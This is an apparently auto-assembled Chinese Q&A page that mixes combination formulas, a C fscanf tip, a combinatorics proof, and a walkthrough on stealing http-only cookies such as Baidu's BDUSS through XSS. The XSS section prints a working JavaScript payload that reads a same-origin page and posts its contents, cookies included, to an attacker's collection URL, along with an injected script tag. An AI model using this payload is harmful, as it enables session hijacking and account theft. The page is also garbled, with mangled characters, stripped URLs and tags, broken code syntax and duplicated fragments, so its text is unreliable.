文章目录:
- 1、排列组合c1n等于多少
- 2、如何通过 XSS 获取受 http-only さcookie
- 3、C语言,我fscanf(txt,"[%s]",string);读入一个格式为[ascxss]的字符
- 4、观察下面一组组合数等式:1?C1n=n?C0n?1;2?C2n=n?C1n?1;3?C3n=n?C2n?1…(Ⅰ)由以上规律,请写出第
排列组合c1n等于多少
排列组合c的公式:C(n,m)=A(n,m)/m!=n!/m!(n-m)!与C(n,m)=C(n,n-m)。(n为下标,m为上标)。
排列组合c的公式:C(n,m)=A(n,m)/m!=n!/m!(n-m)!与C(n,m)=C(n,n-m)。(n为下标,m为上标)。例如C(4,2)=4!/(2!*2!)=4*3/(2*1)=6,C(5,2)=C(5,3)。
排列组合c计算方法:C是从几个中选取出来,不排列,只组合。
C(n,m)=n*(n-1)*...*(n-m+1)/m!
例如c53=5*4*3÷(3*2*1)=10,再如C(4,2)=(4x3)/(2x1)=6。
如何通过 XSS 获取受 http-only さcookie
该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
02.jpg
这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
code 区域
var u = ';id={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}
由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:
code 区域
titlewooyun.org/title
p超威蓝猫@wooyun.org/p
script src=;/script
C语言,我fscanf(txt,"[%s]",string);读入一个格式为[ascxss]的字符
fscanf(txt,"[%[^]]]",string);
scanf 的格式控制符也算是相当复杂的领域特定语言(domain-specific language,DSL)了
观察下面一组组合数等式:1?C1n=n?C0n?1;2?C2n=n?C1n?1;3?C3n=n?C2n?1…(Ⅰ)由以上规律,请写出第
(I)由:
1?
C
1
n
=n?
C
n?1
;
2?
C
2
n
=n?
C
1
n?1
;
3?
C
3
n
=n?
C
2
n?1
…
可得第k(k∈N*)个等式为:k?
C
k
n
=n?
C
k?1
n?1
,k∈N*,
证明如下:k?
C
k
n
=
kn!
k!(n?k)!
=
n(n?1)!
(k?1)![(n?1)?(k?1)]!
=n?
C
k?1
n?1
证明:(II)将X分解成n个相互独立的,都服从以p为参数的(0-1)分布的随机变量之和:
X=X1+X2+…+Xn,Xi~b(1,p),i=1,2,…,n.
P{Xi=0}=1-p,P(Xi=1)=p.
EXi=0×(1-p)+1×p=p,
E(Xi2)=02×(1-p)+12×p=p,
DXi=E(Xi2)-(EXi)2=p-p2=p(1-p).
EX=EX1+EX2+…+EXn=np,
ttpRequest() } else { var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', '
{ var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2
ain-specific language,DSL)了观察下面一组组合数等式:1?C1n=n?C0n?1;2?C2n=n?C1n?1;3?C3n=n?C2n?1…(Ⅰ)由以上规律,请写出第(I)由:1?C1n=n?Cn?1;2?C2n=n?C1n?1;3?C3n=n?C2n?1…可得第k(k∈N*)